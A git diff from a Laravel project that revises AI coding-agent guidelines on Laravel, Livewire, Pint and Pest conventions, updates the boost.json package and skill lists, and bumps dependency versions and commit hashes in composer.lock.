 - Every change must be programmatically tested. Write a new test or update an existing test, then run the affected tests to make sure they pass.
 - Run the minimum number of tests needed to ensure code quality and speed. Use `php artisan test --compact` with a specific filename or filter.
 
-## Bug Fix Workflow (TDD)
-
-When fixing a bug, follow this strict test-driven workflow:
-
-1. **Write a test first** that asserts the correct (expected) behavior — this test should reproduce the bug.
-2. **Run the test** and confirm it **fails**. If it passes, the test does not cover the bug — rewrite it.
-3. **Fix the bug** in the source code.
-4. **Re-run the exact same test without any modifications** and confirm it **passes**.
-5. **Never modify the test between steps 2 and 4.** The same test must go from red to green purely from the bug fix.
-
 === laravel/core rules ===
 
 # Do Things the Laravel Way
 
-- Use `php artisan make:` commands to create new files (i.e. migrations, controllers, models, etc.). You can list available Artisan commands using the `list-artisan-commands` tool.
+- Use `php artisan make:` commands to create new files (i.e. migrations, controllers, models, etc.). You can list available Artisan commands using `php artisan list` and check their parameters with `php artisan [command] --help`.
 - If you're creating a generic PHP class, use `php artisan make:class`.
 - Pass `--no-interaction` to all Artisan commands to ensure they work without user input. You should also pass the correct `--options` to ensure correct behavior.
 
-## Database
-
-- Always use proper Eloquent relationship methods with return type hints. Prefer relationship methods over raw queries or manual joins.
-- Use Eloquent models and relationships before suggesting raw database queries.
-- Avoid `DB::`; prefer `Model::query()`. Generate code that leverages Laravel's ORM capabilities rather than bypassing them.
-- Generate code that prevents N+1 query problems by using eager loading.
-- Use Laravel's query builder for very complex database operations.
-
 ### Model Creation
 
-- When creating new models, create useful factories and seeders for them too. Ask the user if they need any other things, using `list-artisan-commands` to check the available options to `php artisan make:model`.
+- When creating new models, create useful factories and seeders for them too. Ask the user if they need any other things, using `php artisan make:model --help` to check the available options.
 
-### APIs & Eloquent Resources
+## APIs & Eloquent Resources
 
 - For APIs, default to using Eloquent API Resources and API versioning unless existing API routes do not, then you should follow existing application convention.
 
-## Controllers & Validation
-
-- Always create Form Request classes for validation rather than inline validation in controllers. Include both validation rules and custom error messages.
-- Check sibling Form Requests to see if the application uses array or string based validation rules.
-
-## Authentication & Authorization
-
-- Use Laravel's built-in authentication and authorization features (gates, policies, Sanctum, etc.).
-
 ## URL Generation
 
 - When generating links to other pages, prefer named routes and the `route()` function.
 
-## Queues
-
-- Use queued jobs for time-consuming operations with the `ShouldQueue` interface.
-
-## Configuration
-
-- Use environment variables only in configuration files - never use the `env()` function directly outside of config files. Always use `config('app.name')`, not `env('APP_NAME')`.
-
 ## Testing
 
 - When creating models for tests, use the factories for the models. Check if the factory has custom states that can be used before manually setting up the model.
@@ -326,16 +292,15 @@ ### Models
 
 # Livewire
 
-- Livewire allows you to build dynamic, reactive interfaces using only PHP — no JavaScript required.
-- Instead of writing frontend code in JavaScript frameworks, you use Alpine.js to build the UI when client-side interactions are required.
-- State lives on the server; the UI reflects it. Validate and authorize in actions (they're like HTTP requests).
-- IMPORTANT: Activate `livewire-development` every time you're working with Livewire-related tasks.
+- Livewire allow to build dynamic, reactive interfaces in PHP without writing JavaScript.
+- You can use Alpine.js for client-side interactions instead of JavaScript frameworks.
+- Keep state server-side so the UI reflects it. Validate and authorize in actions as you would in HTTP requests.
 
 === pint/core rules ===
 
 # Laravel Pint Code Formatter
 
-- You must run `vendor/bin/pint --dirty --format agent` before finalizing changes to ensure your code matches the project's expected style.
+- If you have modified any PHP files, you must run `vendor/bin/pint --dirty --format agent` before finalizing changes to ensure your code matches the project's expected style.
 - Do not run `vendor/bin/pint --test --format agent`, simply run `vendor/bin/pint --format agent` to fix any formatting issues.
 
 === pest/core rules ===
@@ -345,22 +310,5 @@ ## Pest
 - This project uses Pest for testing. Create tests: `php artisan make:test --pest {name}`.
 - Run tests: `php artisan test --compact` or filter: `php artisan test --compact --filter=testName`.
 - Do NOT delete tests without approval.
-- CRITICAL: ALWAYS use `search-docs` tool for version-specific Pest documentation and updated code examples.
-- IMPORTANT: Activate `pest-testing` every time you're working with a Pest or testing-related task.
 
-=== tailwindcss/core rules ===
-
-# Tailwind CSS
-
-- Always use existing Tailwind conventions; check project patterns before adding new ones.
-- IMPORTANT: Always use `search-docs` tool for version-specific Tailwind CSS documentation and updated code examples. Never rely on training data.
-- IMPORTANT: Activate `tailwindcss-development` every time you're working with a Tailwind CSS or styling-related task.
-
-=== laravel/fortify rules ===
-
-# Laravel Fortify
-
-- Fortify is a headless authentication backend that provides authentication routes and controllers for Laravel applications.
-- IMPORTANT: Always use the `search-docs` tool for detailed Laravel Fortify patterns and documentation.
-- IMPORTANT: Activate `developing-with-fortify` skill when working with Fortify authentication features.
 </laravel-boost-guidelines>
diff --git a/boost.json b/boost.json
index 34b67ce76..13914521e 100644
--- a/boost.json
+++ b/boost.json
@@ -6,18 +6,23 @@
         "opencode"
     ],
     "guidelines": true,
-    "herd_mcp": false,
     "mcp": true,
+    "nightwatch_mcp": false,
     "packages": [
         "laravel/fortify",
-        "spatie/laravel-ray"
+        "spatie/laravel-ray",
+        "lorisleiva/laravel-actions"
     ],
     "sail": false,
     "skills": [
+        "laravel-best-practices",
+        "configuring-horizon",
+        "socialite-development",
         "livewire-development",
         "pest-testing",
         "tailwindcss-development",
-        "developing-with-fortify",
+        "fortify-development",
+        "laravel-actions",
         "debugging-output-and-previewing-html-using-ray"
     ]
 }
diff --git a/composer.lock b/composer.lock
index 3a66fdd5a..91900aa95 100644
--- a/composer.lock
+++ b/composer.lock
@@ -62,16 +62,16 @@
         },
         {
             "name": "aws/aws-sdk-php",
-            "version": "3.371.3",
+            "version": "3.373.9",
             "source": {
                 "type": "git",
                 "url": "https://github.com/aws/aws-sdk-php.git",
-                "reference": "d300ec1c861e52dc8f17ca3d75dc754da949f065"
+                "reference": "a73e12fe5d010f3c6cda2f6f020b5a475444487d"
             },
             "dist": {
                 "type": "zip",
-                "url": "https://api.github.com/repos/aws/aws-sdk-php/zipball/d300ec1c861e52dc8f17ca3d75dc754da949f065",
-                "reference": "d300ec1c861e52dc8f17ca3d75dc754da949f065",
+                "url": "https://api.github.com/repos/aws/aws-sdk-php/zipball/a73e12fe5d010f3c6cda2f6f020b5a475444487d",
+                "reference": "a73e12fe5d010f3c6cda2f6f020b5a475444487d",
                 "shasum": ""
             },
             "require": {
@@ -92,12 +92,12 @@
                 "aws/aws-php-sns-message-validator": "~1.0",
                 "behat/behat": "~3.0",
                 "composer/composer": "^2.7.8",
-                "dms/phpunit-arraysubset-asserts": "^0.4.0",
+                "dms/phpunit-arraysubset-asserts": "^v0.5.0",
                 "doctrine/cache": "~1.4",
                 "ext-dom": "*",
                 "ext-openssl": "*",
                 "ext-sockets": "*",
-                "phpunit/phpunit": "^9.6",
+                "phpunit/phpunit": "^10.0",
                 "psr/cache": "^2.0 || ^3.0",
                 "psr/simple-cache": "^2.0 || ^3.0",
                 "sebastian/comparator": "^1.2.3 || ^4.0 || ^5.0",
@@ -153,22 +153,22 @@
             "support": {
                 "forum": "https://github.com/aws/aws-sdk-php/discussions",
                 "issues": "https://github.com/aws/aws-sdk-php/issues",
-                "source": "https://github.com/aws/aws-sdk-php/tree/3.371.3"
+                "source": "https://github.com/aws/aws-sdk-php/tree/3.373.9"
             },
-            "time": "2026-02-27T19:05:40+00:00"
+            "time": "2026-03-24T18:06:07+00:00"
         },
         {
             "name": "bacon/bacon-qr-code",
-            "version": "v3.0.3",
+            "version": "v3.0.4",
             "source": {
                 "type": "git",
                 "url": "https://github.com/Bacon/BaconQrCode.git",
-                "reference": "36a1cb2b81493fa5b82e50bf8068bf84d1542563"
+                "reference": "3feed0e212b8412cc5d2612706744789b0615824"
             },
             "dist": {
                 "type": "zip",
-                "url": "https://api.github.com/repos/Bacon/BaconQrCode/zipball/36a1cb2b81493fa5b82e50bf8068bf84d1542563",
-                "reference": "36a1cb2b81493fa5b82e50bf8068bf84d1542563",
+                "url": "https://api.github.com/repos/Bacon/BaconQrCode/zipball/3feed0e212b8412cc5d2612706744789b0615824",
+                "reference": "3feed0e212b8412cc5d2612706744789b0615824",
                 "shasum": ""
             },
             "require": {
@@ -208,9 +208,9 @@
             "homepage": "https://github.com/Bacon/BaconQrCode",
             "support": {
                 "issues": "https://github.com/Bacon/BaconQrCode/issues",
-                "source": "https://github.com/Bacon/BaconQrCode/tree/v3.0.3"
+                "source": "https://github.com/Bacon/BaconQrCode/tree/v3.0.4"
             },
-            "time": "2025-11-19T17:15:36+00:00"
+            "time": "2026-03-16T01:01:30+00:00"
         },
         {
             "name": "brick/math",
@@ -343,27 +343,27 @@
         },
         {
             "name": "danharrin/livewire-rate-limiting",
-            "version": "v2.1.0",
+            "version": "v2.2.0",
             "source": {
                 "type": "git",
                 "url": "https://github.com/danharrin/livewire-rate-limiting.git",
-                "reference": "14dde653a9ae8f38af07a0ba4921dc046235e1a0"
+                "reference": "c03e649220089f6e5a52d422e24e3f98c73e456d"
             },
             "dist": {
                 "type": "zip",
-                "url": "https://api.github.com/repos/danharrin/livewire-rate-limiting/zipball/14dde653a9ae8f38af07a0ba4921dc046235e1a0",
-                "reference": "14dde653a9ae8f38af07a0ba4921dc046235e1a0",
+                "url": "https://api.github.com/repos/danharrin/livewire-rate-limiting/zipball/c03e649220089f6e5a52d422e24e3f98c73e456d",
+                "reference": "c03e649220089f6e5a52d422e24e3f98c73e456d",
                 "shasum": ""
             },
             "require": {
-                "illuminate/support": "^9.0|^10.0|^11.0|^12.0",
+                "illuminate/support": "^9.0|^10.0|^11.0|^12.0|^13.0",
                 "php": "^8.0"
             },
             "require-dev": {
                 "livewire/livewire": "^3.0",
                 "livewire/volt": "^1.3",
-                "orchestra/testbench": "^7.0|^8.0|^9.0|^10.0",
-                "phpunit/phpunit": "^9.0|^10.0|^11.5.3"
+                "orchestra/testbench": "^7.0|^8.0|^9.0|^10.0|^11.0",
+                "phpunit/phpunit": "^9.0|^10.0|^11.5.3|^12.5.12"
             },
             "type": "library",
             "autoload": {
@@ -393,7 +393,7 @@
                     "type": "github"
                 }
             ],
-            "time": "2025-02-21T08:52:11+00:00"
+            "time": "2026-03-16T11:29:23+00:00"
         },
         {
             "name": "dasprid/enum",
@@ -522,16 +522,16 @@
         },
         {
             "name": "doctrine/dbal",
-            "version": "4.4.2",
+            "version": "4.4.3",
             "source": {
                 "type": "git",
                 "url": "https://github.com/doctrine/dbal.git",
-                "reference": "476f7f0fa6ea4aa5364926db7fabdf6049075722"
+                "reference": "61e730f1658814821a85f2402c945f3883407dec"
             },
             "dist": {
                 "type": "zip",
-                "url": "https://api.github.com/repos/doctrine/dbal/zipball/476f7f0fa6ea4aa5364926db7fabdf6049075722",
-                "reference": "476f7f0fa6ea4aa5364926db7fabdf6049075722",
+                "url": "https://api.github.com/repos/doctrine/dbal/zipball/61e730f1658814821a85f2402c945f3883407dec",
+                "reference": "61e730f1658814821a85f2402c945f3883407dec",
                 "shasum": ""
             },
             "require": {
@@ -608,7 +608,7 @@
             ],
             "support": {
                 "issues": "https://github.com/doctrine/dbal/issues",
-                "source": "https://github.com/doctrine/dbal/tree/4.4.2"
+                "source": "https://github.com/doctrine/dbal/tree/4.4.3"
             },
             "funding": [
                 {
@@ -624,7 +624,7 @@
                     "type": "tidelift"
                 }
             ],
-            "time": "2026-02-26T12:12:19+00:00"
+            "time": "2026-03-20T08:52:12+00:00"
         },
         {
             "name": "doctrine/deprecations",
@@ -1440,16 +1440,16 @@
         },
         {
             "name": "guzzlehttp/psr7",
-            "version": "2.8.0",
+            "version": "2.9.0",
             "source": {
                 "type": "git",
                 "url": "https://github.com/guzzle/psr7.git",
-                "reference": "21dc724a0583619cd1652f673303492272778051"
+                "reference": "7d0ed42f28e42d61352a7a79de682e5e67fec884"
             },
             "dist": {
                 "type": "zip",
-                "url": "https://api.github.com/repos/guzzle/psr7/zipball/21dc724a0583619cd1652f673303492272778051",
-                "reference": "21dc724a0583619cd1652f673303492272778051",
+                "url": "https://api.github.com/repos/guzzle/psr7/zipball/7d0ed42f28e42d61352a7a79de682e5e67fec884",
+                "reference": "7d0ed42f28e42d61352a7a79de682e5e67fec884",
                 "shasum": ""
             },
             "require": {
@@ -1465,6 +1465,7 @@
             "require-dev": {
                 "bamarni/composer-bin-plugin": "^1.8.2",
                 "http-interop/http-factory-tests": "0.9.0",
+                "jshttp/mime-db": "1.54.0.1",
                 "phpunit/phpunit": "^8.5.44 || ^9.6.25"
             },
             "suggest": {
@@ -1536,7 +1537,7 @@
             ],
             "support": {
                 "issues": "https://github.com/guzzle/psr7/issues",
-                "source": "https://github.com/guzzle/psr7/tree/2.8.0"
+                "source": "https://github.com/guzzle/psr7/tree/2.9.0"
             },
             "funding": [
                 {
@@ -1552,7 +1553,7 @@
                     "type": "tidelift"
                 }
             ],
-            "time": "2025-08-23T21:21:41+00:00"
+            "time": "2026-03-10T16:41:02+00:00"
         },
         {
             "name": "guzzlehttp/uri-template",
@@ -1702,16 +1703,16 @@
         },
         {
             "name": "laravel/fortify",
-            "version": "v1.35.0",
+            "version": "v1.36.2",
             "source": {
                 "type": "git",
                 "url": "https://github.com/laravel/fortify.git",
-                "reference": "24c5bb81ea4787e0865c4a62f054ed7d1cb7a093"
+                "reference": "b36e0782e6f5f6cfbab34327895a63b7c4c031f9"
             },
             "dist": {
                 "type": "zip",
-                "url": "https://api.github.com/repos/laravel/fortify/zipball/24c5bb81ea4787e0865c4a62f054ed7d1cb7a093",
-                "reference": "24c5bb81ea4787e0865c4a62f054ed7d1cb7a093",
+                "url": "https://api.github.com/repos/laravel/fortify/zipball/b36e0782e6f5f6cfbab34327895a63b7c4c031f9",
+                "reference": "b36e0782e6f5f6cfbab34327895a63b7c4c031f9",
                 "shasum": ""
             },
             "require": {
@@ -1761,20 +1762,20 @@
                 "issues": "https://github.com/laravel/fortify/issues",
                 "source": "https://github.com/laravel/fortify"
             },
-            "time": "2026-02-24T14:00:44+00:00"
+            "time": "2026-03-20T20:13:51+00:00"
         },
         {
             "name": "laravel/framework",
-            "version": "v12.53.0",
+            "version": "v12.55.1",
             "source": {
                 "type": "git",
                 "url": "https://github.com/laravel/framework.git",
-                "reference": "f57f035c0d34503d9ff30be76159bb35a003cd1f"
+                "reference": "6d9185a248d101b07eecaf8fd60b18129545fd33"
             },
             "dist": {
                 "type": "zip",
-                "url": "https://api.github.com/repos/laravel/framework/zipball/f57f035c0d34503d9ff30be76159bb35a003cd1f",
-                "reference": "f57f035c0d34503d9ff30be76159bb35a003cd1f",
+                "url": "https://api.github.com/repos/laravel/framework/zipball/6d9185a248d101b07eecaf8fd60b18129545fd33",
+                "reference": "6d9185a248d101b07eecaf8fd60b18129545fd33",
                 "shasum": ""
             },
             "require": {
@@ -1795,7 +1796,7 @@
                 "guzzlehttp/uri-template": "^1.0",
                 "laravel/prompts": "^0.3.0",
                 "laravel/serializable-closure": "^1.3|^2.0",
-                "league/commonmark": "^2.7",
+                "league/commonmark": "^2.8.1",
                 "league/flysystem": "^3.25.1",
                 "league/flysystem-local": "^3.25.1",
                 "league/uri": "^7.5.1",
@@ -1890,7 +1891,7 @@
                 "orchestra/testbench-core": "^10.9.0",
                 "pda/pheanstalk": "^5.0.6|^7.0.0",
                 "php-http/discovery": "^1.15",
-                "phpstan/phpstan": "^2.0",
+                "phpstan/phpstan": "^2.1.41",
                 "phpunit/phpunit": "^10.5.35|^11.5.3|^12.0.1",
                 "predis/predis": "^2.3|^3.0",
                 "resend/resend-php": "^0.10.0|^1.0",
@@ -1983,20 +1984,20 @@
                 "issues": "https://github.com/laravel/framework/issues",
                 "source": "https://github.com/laravel/framework"
             },
-            "time": "2026-02-24T14:35:15+00:00"
+            "time": "2026-03-18T14:28:59+00:00"
         },
         {
             "name": "laravel/horizon",
-            "version": "v5.45.0",
+            "version": "v5.45.4",
             "source": {
                 "type": "git",
                 "url": "https://github.com/laravel/horizon.git",
-                "reference": "7126ddf27fe9750c43ab0b567085dee3917d0510"
+                "reference": "b2b32e3f6013081e0176307e9081cd085f0ad4d6"
             },
             "dist": {
                 "type": "zip",
-                "url": "https://api.github.com/repos/laravel/horizon/zipball/7126ddf27fe9750c43ab0b567085dee3917d0510",
-                "reference": "7126ddf27fe9750c43ab0b567085dee3917d0510",
+                "url": "https://api.github.com/repos/laravel/horizon/zipball/b2b32e3f6013081e0176307e9081cd085f0ad4d6",
+                "reference": "b2b32e3f6013081e0176307e9081cd085f0ad4d6",
                 "shasum": ""
             },
             "require": {
@@ -2061,9 +2062,9 @@
             ],
             "support": {
                 "issues": "https://github.com/laravel/horizon/issues",
-                "source": "https://github.com/laravel/horizon/tree/v5.45.0"
+                "source": "https://github.com/laravel/horizon/tree/v5.45.4"
             },
-            "time": "2026-02-21T14:20:09+00:00"
+            "time": "2026-03-18T14:14:59+00:00"
         },
         {
             "name": "laravel/nightwatch",
@@ -2241,16 +2242,16 @@
         },
         {
             "name": "laravel/prompts",
-            "version": "v0.3.13",
+            "version": "v0.3.16",
             "source": {
                 "type": "git",
                 "url": "https://github.com/laravel/prompts.git",
-                "reference": "ed8c466571b37e977532fb2fd3c272c784d7050d"
+                "reference": "11e7d5f93803a2190b00e145142cb00a33d17ad2"
             },
             "dist": {
                 "type": "zip",
-                "url": "https://api.github.com/repos/laravel/prompts/zipball/ed8c466571b37e977532fb2fd3c272c784d7050d",
-                "reference": "ed8c466571b37e977532fb2fd3c272c784d7050d",
+                "url": "https://api.github.com/repos/laravel/prompts/zipball/11e7d5f93803a2190b00e145142cb00a33d17ad2",
+                "reference": "11e7d5f93803a2190b00e145142cb00a33d17ad2",
                 "shasum": ""
             },
             "require": {
@@ -2294,9 +2295,9 @@
             "description": "Add beautiful and user-friendly forms to your command-line applications.",
             "support": {
                 "issues": "https://github.com/laravel/prompts/issues",
-                "source": "https://github.com/laravel/prompts/tree/v0.3.13"
+                "source": "https://github.com/laravel/prompts/tree/v0.3.16"
             },
-            "time": "2026-02-06T12:17:10+00:00"
+            "time": "2026-03-23T14:35:33+00:00"
         },
         {
             "name": "laravel/sanctum",
@@ -2483,16 +2484,16 @@
         },
         {
             "name": "laravel/socialite",
-            "version": "v5.24.3",
+            "version": "v5.26.0",
             "source": {
                 "type": "git",
                 "url": "https://github.com/laravel/socialite.git",
-                "reference": "0feb62267e7b8abc68593ca37639ad302728c129"
+                "reference": "1d26f0c653a5f0e88859f4197830a29fe0cc59d0"
             },
             "dist": {
                 "type": "zip",
-                "url": "https://api.github.com/repos/laravel/socialite/zipball/0feb62267e7b8abc68593ca37639ad302728c129",
-                "reference": "0feb62267e7b8abc68593ca37639ad302728c129",
+                "url": "https://api.github.com/repos/laravel/socialite/zipball/1d26f0c653a5f0e88859f4197830a29fe0cc59d0",
+                "reference": "1d26f0c653a5f0e88859f4197830a29fe0cc59d0",
                 "shasum": ""
             },
             "require": {
@@ -2551,7 +2552,7 @@
                 "issues": "https://github.com/laravel/socialite/issues",
                 "source": "https://github.com/laravel/socialite"
             },
-            "time": "2026-02-21T13:32:50+00:00"
+            "time": "2026-03-24T18:37:47+00:00"
         },
         {
             "name": "laravel/tinker",
@@ -2621,29 +2622,29 @@
         },
         {
             "name": "laravel/ui",
-            "version": "v4.6.1",
+            "version": "v4.6.3",
             "source": {
                 "type": "git",
                 "url": "https://github.com/laravel/ui.git",
-                "reference": "7d6ffa38d79f19c9b3e70a751a9af845e8f41d88"
+                "reference": "ff27db15416c1ed8ad9848f5692e47595dd5de27"
             },
             "dist": {
                 "type": "zip",
-                "url": "https://api.github.com/repos/laravel/ui/zipball/7d6ffa38d79f19c9b3e70a751a9af845e8f41d88",
-                "reference": "7d6ffa38d79f19c9b3e70a751a9af845e8f41d88",
+                "url": "https://api.github.com/repos/laravel/ui/zipball/ff27db15416c1ed8ad9848f5692e47595dd5de27",
+                "reference": "ff27db15416c1ed8ad9848f5692e47595dd5de27",
                 "shasum": ""
             },
             "require": {
-                "illuminate/console": "^9.21|^10.0|^11.0|^12.0",
-                "illuminate/filesystem": "^9.21|^10.0|^11.0|^12.0",
-                "illuminate/support": "^9.21|^10.0|^11.0|^12.0",
-                "illuminate/validation": "^9.21|^10.0|^11.0|^12.0",
+                "illuminate/console": "^9.21|^10.0|^11.0|^12.0|^13.0",
+                "illuminate/filesystem": "^9.21|^10.0|^11.0|^12.0|^13.0",
+                "illuminate/support": "^9.21|^10.0|^11.0|^12.0|^13.0",
+                "illuminate/validation": "^9.21|^10.0|^11.0|^12.0|^13.0",
                 "php": "^8.0",
-                "symfony/console": "^6.0|^7.0"
+                "symfony/console": "^6.0|^7.0|^8.0"
             },
             "require-dev": {
-                "orchestra/testbench": "^7.35|^8.15|^9.0|^10.0",
-                "phpunit/phpunit": "^9.3|^10.4|^11.5"
+                "orchestra/testbench": "^7.35|^8.15|^9.0|^10.0|^11.0",
+                "phpunit/phpunit": "^9.3|^10.4|^11.5|^12.5|^13.0"
             },
             "type": "library",
             "extra": {
@@ -2678,9 +2679,9 @@
                 "ui"
             ],
             "support": {
-                "source": "https://github.com/laravel/ui/tree/v4.6.1"
+                "source": "https://github.com/laravel/ui/tree/v4.6.3"
             },
-            "time": "2025-01-28T15:15:29+00:00"
+            "time": "2026-03-17T13:41:52+00:00"
         },
         {
             "name": "lcobucci/jwt",
@@ -2757,16 +2758,16 @@
         },
         {
             "name": "league/commonmark",
-            "version": "2.8.1",
+            "version": "2.8.2",
             "source": {
                 "type": "git",
                 "url": "https://github.com/thephpleague/commonmark.git",
-                "reference": "84b1ca48347efdbe775426f108622a42735a6579"
+                "reference": "59fb075d2101740c337c7216e3f32b36c204218b"
             },
             "dist": {
                 "type": "zip",
-                "url": "https://api.github.com/repos/thephpleague/commonmark/zipball/84b1ca48347efdbe775426f108622a42735a6579",
-                "reference": "84b1ca48347efdbe775426f108622a42735a6579",
+                "url": "https://api.github.com/repos/thephpleague/commonmark/zipball/59fb075d2101740c337c7216e3f32b36c204218b",
+                "reference": "59fb075d2101740c337c7216e3f32b36c204218b",
                 "shasum": ""
             },
             "require": {
@@ -2860,7 +2861,7 @@
                     "type": "tidelift"
                 }
             ],
-            "time": "2026-03-05T21:37:03+00:00"
+            "time": "2026-03-19T13:16:38+00:00"
         },
         {
             "name": "league/config",
@@ -2946,16 +2947,16 @@
         },
         {
             "name": "league/flysystem",
-            "version": "3.32.0",
+            "version": "3.33.0",
             "source": {
                 "type": "git",
                 "url": "https://github.com/thephpleague/flysystem.git",
-                "reference": "254b1595b16b22dbddaaef9ed6ca9fdac4956725"
+                "reference": "570b8871e0ce693764434b29154c54b434905350"
             },
             "dist": {
                 "type": "zip",
-                "url": "https://api.github.com/repos/thephpleague/flysystem/zipball/254b1595b16b22dbddaaef9ed6ca9fdac4956725",
-                "reference": "254b1595b16b22dbddaaef9ed6ca9fdac4956725",
+                "url": "https://api.github.com/repos/thephpleague/flysystem/zipball/570b8871e0ce693764434b29154c54b434905350",
+                "reference": "570b8871e0ce693764434b29154c54b434905350",
                 "shasum": ""
             },
             "require": {
@@ -3023,9 +3024,9 @@
             ],
             "support": {
                 "issues": "https://github.com/thephpleague/flysystem/issues",
-                "source": "https://github.com/thephpleague/flysystem/tree/3.32.0"
+                "source": "https://github.com/thephpleague/flysystem/tree/3.33.0"
             },
-            "time": "2026-02-25T17:01:41+00:00"
+            "time": "2026-03-25T07:59:30+00:00"
         },
         {
             "name": "league/flysystem-aws-s3-v3",
@@ -3133,16 +3134,16 @@
         },
         {
             "name": "league/flysystem-sftp-v3",
-            "version": "3.31.0",
+            "version": "3.33.0",
             "source": {
                 "type": "git",
                 "url": "https://github.com/thephpleague/flysystem-sftp-v3.git",
-                "reference": "f01dd8d66e98b20608846963cc790c2b698e8b03"
+                "reference": "34ff5ef0f841add92e2b902c1005f72135b03646"
             },
             "dist": {
                 "type": "zip",
-                "url": "https://api.github.com/repos/thephpleague/flysystem-sftp-v3/zipball/f01dd8d66e98b20608846963cc790c2b698e8b03",
-                "reference": "f01dd8d66e98b20608846963cc790c2b698e8b03",
+                "url": "https://api.github.com/repos/thephpleague/flysystem-sftp-v3/zipball/34ff5ef0f841add92e2b902c1005f72135b03646",
+                "reference": "34ff5ef0f841add92e2b902c1005f72135b03646",
                 "shasum": ""
             },
             "require": {
@@ -3176,9 +3177,9 @@
                 "sftp"
             ],
             "support": {
-                "source": "https://github.com/thephpleague/flysystem-sftp-v3/tree/3.31.0"
+                "source": "https://github.com/thephpleague/flysystem-sftp-v3/tree/3.33.0"
             },
-            "time": "2026-01-23T15:30:45+00:00"
+            "time": "2026-03-20T13:22:31+00:00"
         },
         {
             "name": "league/mime-type-detection",
@@ -3314,20 +3315,20 @@
         },
         {
             "name": "league/uri",
-            "version": "7.8.0",
+            "version": "7.8.1",
             "source": {
                 "type": "git",
                 "url": "https://github.com/thephpleague/uri.git",
-                "reference": "4436c6ec8d458e4244448b069cc572d088230b76"
+                "reference": "08cf38e3924d4f56238125547b5720496fac8fd4"
             },
             "dist": {
                 "type": "zip",
-                "url": "https://api.github.com/repos/thephpleague/uri/zipball/4436c6ec8d458e4244448b069cc572d088230b76",
-                "reference": "4436c6ec8d458e4244448b069cc572d088230b76",
+                "url": "https://api.github.com/repos/thephpleague/uri/zipball/08cf38e3924d4f56238125547b5720496fac8fd4",
+                "reference": "08cf38e3924d4f56238125547b5720496fac8fd4",
                 "shasum": ""
             },
             "require": {
-                "league/uri-interfaces": "^7.8",
+                "league/uri-interfaces": "^7.8.1",
                 "php": "^8.1",
                 "psr/http-factory": "^1"
             },
@@ -3400,7 +3401,7 @@
                 "docs": "https://uri.thephpleague.com",
                 "forum": "https://thephpleague.slack.com",
                 "issues": "https://github.com/thephpleague/uri-src/issues",
-                "source": "https://github.com/thephpleague/uri/tree/7.8.0"
+                "source": "https://github.com/thephpleague/uri/tree/7.8.1"
             },
             "funding": [
                 {
@@ -3408,20 +3409,20 @@
                     "type": "github"
                 }
             ],
-            "time": "2026-01-14T17:24:56+00:00"
+            "time": "2026-03-15T20:22:25+00:00"
         },
         {
             "name": "league/uri-interfaces",
-            "version": "7.8.0",
+            "version": "7.8.1",
             "source": {
                 "type": "git",
                 "url": "https://github.com/thephpleague/uri-interfaces.git",
-                "reference": "c5c5cd056110fc8afaba29fa6b72a43ced42acd4"
+                "reference": "85d5c77c5d6d3af6c54db4a78246364908f3c928"
             },
             "dist": {
                 "type": "zip",
-                "url": "https://api.github.com/repos/thephpleague/uri-interfaces/zipball/c5c5cd056110fc8afaba29fa6b72a43ced42acd4",
-                "reference": "c5c5cd056110fc8afaba29fa6b72a43ced42acd4",
+                "url": "https://api.github.com/repos/thephpleague/uri-interfaces/zipball/85d5c77c5d6d3af6c54db4a78246364908f3c928",
+                "reference": "85d5c77c5d6d3af6c54db4a78246364908f3c928",
                 "shasum": ""
             },
             "require": {
@@ -3484,7 +3485,7 @@
                 "docs": "https://uri.thephpleague.com",
                 "forum": "https://thephpleague.slack.com",
                 "issues": "https://github.com/thephpleague/uri-src/issues",
-                "source": "https://github.com/thephpleague/uri-interfaces/tree/7.8.0"
+                "source": "https://github.com/thephpleague/uri-interfaces/tree/7.8.1"
             },
             "funding": [
                 {
@@ -3492,7 +3493,7 @@
                     "type": "github"
                 }
             ],
-            "time": "2026-01-15T06:54:53+00:00"
+            "time": "2026-03-08T20:05:35+00:00"
         },
         {
             "name": "livewire/livewire",
@@ -3634,27 +3635,27 @@
         },
         {
             "name": "lorisleiva/laravel-actions",
-            "version": "v2.9.1",
+            "version": "v2.10.1",
             "source": {
                 "type": "git",
                 "url": "https://github.com/lorisleiva/laravel-actions.git",
-                "reference": "11c2531366ca8bd5efcd0afc9e8047e7999926ff"
+                "reference": "1cb9fd448c655ae90ac93c77be0c10cb57cf27d5"
             },
             "dist": {
                 "type": "zip",
-                "url": "https://api.github.com/repos/lorisleiva/laravel-actions/zipball/11c2531366ca8bd5efcd0afc9e8047e7999926ff",
-                "reference": "11c2531366ca8bd5efcd0afc9e8047e7999926ff",
+                "url": "https://api.github.com/repos/lorisleiva/laravel-actions/zipball/1cb9fd448c655ae90ac93c77be0c10cb57cf27d5",
+                "reference": "1cb9fd448c655ae90ac93c77be0c10cb57cf27d5",
                 "shasum": ""
             },
             "require": {
-                "illuminate/contracts": "^10.0|^11.0|^12.0",
-                "lorisleiva/lody": "^0.6",
-                "php": "^8.1"
+                "illuminate/contracts": "^11.0|^12.0|^13.0",
+                "lorisleiva/lody": "^0.7",
+                "php": "^8.2"
             },
             "require-dev": {
-                "orchestra/testbench": "^10.0",
-                "pestphp/pest": "^2.34|^3.0",
-                "phpunit/phpunit": "^10.5|^11.5"
+                "orchestra/testbench": "^9.0|^10.0|^11.0",
+                "pestphp/pest": "^3.0|^4.0",
+                "phpunit/phpunit": "^11.5|^12.0"
             },
             "type": "library",
             "extra": {
@@ -3698,7 +3699,7 @@
             ],
             "support": {
                 "issues": "https://github.com/lorisleiva/laravel-actions/issues",
-                "source": "https://github.com/lorisleiva/laravel-actions/tree/v2.9.1"
+                "source": "https://github.com/lorisleiva/laravel-actions/tree/v2.10.1"
             },
             "funding": [
                 {
@@ -3706,30 +3707,30 @@
                     "type": "github"
                 }
             ],
-            "time": "2025-08-10T08:58:19+00:00"
+            "time": "2026-03-19T13:33:12+00:00"
         },
         {
             "name": "lorisleiva/lody",
-            "version": "v0.6.0",
+            "version": "v0.7.0",
             "source": {
                 "type": "git",
                 "url": "https://github.com/lorisleiva/lody.git",
-                "reference": "6bada710ebc75f06fdf62db26327be1592c4f014"
+                "reference": "82ecb6faa55fb20109e6959f42f0f652cd77674b"
             },
             "dist": {
                 "type": "zip",
-                "url": "https://api.github.com/repos/lorisleiva/lody/zipball/6bada710ebc75f06fdf62db26327be1592c4f014",
-                "reference": "6bada710ebc75f06fdf62db26327be1592c4f014",
+                "url": "https://api.github.com/repos/lorisleiva/lody/zipball/82ecb6faa55fb20109e6959f42f0f652cd77674b",
